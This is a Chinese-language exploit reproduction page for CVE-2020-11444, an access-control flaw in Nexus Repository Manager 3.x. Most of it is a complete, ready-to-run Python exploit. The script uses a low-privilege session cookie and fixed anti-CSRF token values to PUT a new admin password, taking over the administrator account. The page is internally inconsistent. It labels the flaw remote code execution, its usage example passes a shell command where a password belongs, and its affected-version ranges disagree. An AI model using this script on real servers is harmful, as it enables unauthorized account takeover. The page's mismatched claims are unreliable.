(CVE-2020-11444)Nexus Repository Manager 远程代码执行漏洞¶
一、漏洞简介¶
该漏洞源于不正确的访问控制。攻击者可借助特制的请求利用该漏洞绕过访问限制。
二、漏洞影响¶
Nexus Repository Manager 3.x版本至3.21.2版本
三、复现过程¶
cve-2020-11444_exp.py python3 cve-2020-11444_exp.py http://www.0-sec.org:8081 "sessionID" "touch /tmp/233" #!/usr/bin/python3 # -*- coding:utf-8 -*- # author:zhzyker # from:https://github.com/zhzyker/exphub import sys import requests if len(sys.argv)!=4: print('+-----------------------------------------------------------------------------------------------+') print('+ DES: by zhzyker as https://github.com/zhzyker/exphub +') print('+ CVE-2020-11444 Nexus 3 Unauthorized Vuln (change admin password +') print('+-----------------------------------------------------------------------------------------------+') print('+ USE: python3 <filename> <url> <session> <password> +') print('+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 6c012a5e-88d9-4f96-a05f-3790294dc49a 123456 +') print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1 +') print('+-----------------------------------------------------------------------------------------------+') sys.exit(0) url = sys.argv[1] vuln_url = url + "/service/rest/beta/security/users/admin/change-password" session = sys.argv[2] password = sys.argv[3] headers = { 'accept': "application/json", 'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36", 'NX-ANTI-CSRF-TOKEN': "0.6080434247960143", 'Content-Type': "text/plain", 'Origin': "http://127.0.0.1:8081", 'Cookie': "NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID="+session+"" } data = """%s""" % password r = requests.request('PUT', url=vuln_url, headers=headers, data=data) if r.status_code == 204: print ("[+] Passowrd Change Success") print ("[+] " + url) print ("[+] Username:admin Passowrd:"+password+"") else: print ("[-] SessionID Not available") print ("[-] Target Not CVE-2020-11444 Vuln Good Luck") sys.exit(0)
参考链接¶
https://github.com/zhzyker/exphub/blob/master/nexus/cve-2020-11444_exp.py